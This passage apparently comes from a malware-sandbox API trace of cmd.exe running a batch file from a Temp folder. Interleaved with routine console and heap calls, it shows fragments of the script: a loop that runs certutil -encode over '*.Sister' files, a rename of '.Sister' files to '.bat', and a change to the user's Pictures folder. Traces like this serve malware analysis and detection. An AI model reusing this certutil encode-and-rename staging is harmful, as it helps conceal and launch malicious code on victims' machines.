_BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0292.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.283] GetFileType (hFile=0x50) returned 0x2 [0292.283] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.283] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0292.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.284] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0292.291] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads") returned 0x19 [0292.291] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Downloads") returned 25 [0292.291] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0292.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.291] GetFileType (hFile=0x50) returned 0x2 [0292.291] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.291] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0292.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.292] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x1a) returned 1 [0292.293] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0292.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.293] GetFileType (hFile=0x50) returned 0x2 [0292.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.293] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.293] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0292.294] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0292.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.294] GetFileType (hFile=0x50) returned 0x2 [0292.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.294] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.296] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0292.296] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*.Sister) do ") returned 14 [0292.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.296] GetFileType (hFile=0x50) returned 0x2 [0292.296] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.296] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.297] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0xe) returned 1 [0292.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.297] GetFileType (hFile=0x50) returned 0x2 [0292.297] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.297] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0292.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.298] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d45e10*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8d45e10*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x8) returned 1 [0292.298] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" -encode \"%~a\" \"%~na.Cruel\" ") returned 28 [0292.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.298] GetFileType (hFile=0x50) returned 0x2 [0292.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.298] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.299] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1c) returned 1 [0292.299] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0292.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.299] GetFileType (hFile=0x50) returned 0x2 [0292.300] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.300] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0292.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.300] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0292.309] malloc (_Size=0xffce) returned 0x21ed8e90940 [0292.309] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0292.309] GetProcessHeap () returned 0x21ed8c70000 [0292.309] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cac0 [0292.309] GetProcessHeap () returned 0x21ed8c70000 [0292.309] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95a40 [0292.309] GetProcessHeap () returned 0x21ed8c70000 [0292.309] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95820 [0292.309] GetProcessHeap () returned 0x21ed8c70000 [0292.309] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8bd0 [0292.309] GetProcessHeap () returned 0x21ed8c70000 [0292.309] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8bd0, Size=0x24) returned 0x21ed8d45b30 [0292.309] GetProcessHeap () returned 0x21ed8c70000 [0292.309] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b30) returned 0x24 [0292.309] GetProcessHeap () returned 0x21ed8c70000 [0292.310] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45ce0 [0292.310] FindFirstFileExW (in: lpFileName="*.Sister", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0xffffffffffffffff [0292.310] GetLastError () returned 0x2 [0292.310] GetProcessHeap () returned 0x21ed8c70000 [0292.310] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45ce0) returned 1 [0292.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.310] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0292.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.311] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0292.311] _get_osfhandle (_FileHandle=0) returned 0x4c [0292.311] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0292.312] SetConsoleInputExeNameW () returned 0x1 [0292.312] GetConsoleOutputCP () returned 0x1b5 [0292.312] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0292.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0292.312] ??_V@YAXPEAX@Z () returned 0x1 [0292.312] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0292.313] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0292.313] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.313] SetFilePointer (in: hFile=0x3c, lDistanceToMove=577, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x241 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95820) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a40) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cac0) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bee0) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96880) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.313] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d10) returned 1 [0292.313] GetProcessHeap () returned 0x21ed8c70000 [0292.314] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95780) returned 1 [0292.314] GetProcessHeap () returned 0x21ed8c70000 [0292.314] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cb20) returned 1 [0292.314] GetProcessHeap () returned 0x21ed8c70000 [0292.314] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96a00) returned 1 [0292.314] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.314] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x241 [0292.314] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x2bc, lpOverlapped=0x0) returned 1 [0292.314] SetFilePointer (in: hFile=0x3c, lDistanceToMove=579, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x243 [0292.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0292.314] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.314] GetFileType (hFile=0x3c) returned 0x1 [0292.314] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.314] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x243 [0292.314] GetProcessHeap () returned 0x21ed8c70000 [0292.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0292.315] GetProcessHeap () returned 0x21ed8c70000 [0292.315] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0292.315] _tell (_FileHandle=3) returned 579 [0292.315] _close (_FileHandle=3) returned 0 [0292.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0292.316] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0292.316] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.316] SetFilePointer (in: hFile=0x3c, lDistanceToMove=579, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x243 [0292.316] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.316] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x243 [0292.316] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x2ba, lpOverlapped=0x0) returned 1 [0292.316] SetFilePointer (in: hFile=0x3c, lDistanceToMove=607, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25f [0292.316] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=28, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="cd %UserProFile%\\Pictures\\\r\ntutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 28 [0292.316] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.316] GetFileType (hFile=0x3c) returned 0x1 [0292.316] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.316] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25f [0292.316] GetProcessHeap () returned 0x21ed8c70000 [0292.316] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0292.317] GetProcessHeap () returned 0x21ed8c70000 [0292.317] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4010) returned 0x21ed8d32630 [0292.318] GetProcessHeap () returned 0x21ed8c70000 [0292.318] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45b30 [0292.318] GetEnvironmentVariableW (in: lpName="UserProFile", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0292.318] GetProcessHeap () returned 0x21ed8c70000 [0292.318] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0292.318] GetProcessHeap () returned 0x21ed8c70000 [0292.318] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0292.318] GetProcessHeap () returned 0x21ed8c70000 [0292.318] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0292.319] _wcsicmp (_String1="cd", _String2=")") returned 58 [0292.319] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0292.319] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0292.319] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0292.319] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0292.319] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0292.319] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0292.319] GetProcessHeap () returned 0x21ed8c70000 [0292.319] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96100 [0292.320] GetProcessHeap () returned 0x21ed8c70000 [0292.320] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x16) returned 0x21ed8c95ba0 [0292.320] GetProcessHeap () returned 0x21ed8c70000 [0292.320] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x46) returned 0x21ed8c7ba80 [0292.320] _tell (_FileHandle=3) returned 607 [0292.320] _close (_FileHandle=3) returned 0 [0292.320] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0292.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.320] GetFileType (hFile=0x50) returned 0x2 [0292.320] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.320] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0292.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.321] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0292.329] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads") returned 0x19 [0292.329] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Downloads") returned 25 [0292.329] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0292.329] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.329] GetFileType (hFile=0x50) returned 0x2 [0292.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.329] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0292.329] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.329] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x1a) returned 1 [0292.330] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.330] GetFileType (hFile=0x50) returned 0x2 [0292.330] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.330] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0292.331] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.331] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95bb0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8c95bb0*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0292.331] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" C:\\Users\\FD1HVy\\Pictures\\ ") returned 27 [0292.331] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.331] GetFileType (hFile=0x50) returned 0x2 [0292.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.331] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0292.332] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.332] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1b) returned 1 [0292.333] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0292.333] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.333] GetFileType (hFile=0x50) returned 0x2 [0292.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.333] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0292.334] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.334] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0292.339] malloc (_Size=0xffce) returned 0x21ed8e90940 [0292.339] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0292.339] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0292.339] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0292.339] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0292.339] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0292.339] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0292.339] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0292.339] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe760, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.340] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.340] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.340] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.393] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.394] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0292.394] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0292.394] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0292.394] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0292.394] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0292.394] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0292.394] ??_V@YAXPEAX@Z () returned 0x1 [0292.394] GetProcessHeap () returned 0x21ed8c70000 [0292.394] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed93790c0 [0292.394] GetProcessHeap () returned 0x21ed8c70000 [0292.394] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93790c0, Size=0x46) returned 0x21ed8c7bcb0 [0292.394] GetProcessHeap () returned 0x21ed8c70000 [0292.394] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7bcb0) returned 0x46 [0292.394] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.394] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.394] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.394] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.395] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed97bfc00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fe2b0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fe2b0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0292.398] ??_V@YAXPEAX@Z () returned 0x1 [0292.398] GetProcessHeap () returned 0x21ed8c70000 [0292.398] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cf40 [0292.398] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.398] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.399] GetProcessHeap () returned 0x21ed8c70000 [0292.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed93790c0 [0292.399] GetProcessHeap () returned 0x21ed8c70000 [0292.399] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93790c0, Size=0x46) returned 0x21ed8c7bdf0 [0292.399] GetProcessHeap () returned 0x21ed8c70000 [0292.399] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7bdf0) returned 0x46 [0292.399] _wcsnicmp (_String1="C:", _String2="/D", _MaxCount=0x2) returned 52 [0292.399] malloc (_Size=0xffce) returned 0x21ed97cfbe0 [0292.399] ??_V@YAXPEAX@Z () returned 0x21ed97cfbe0 [0292.399] GetProcessHeap () returned 0x21ed8c70000 [0292.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7bee0 [0292.399] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed97cfbe0 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads") returned 0x19 [0292.399] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0292.400] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 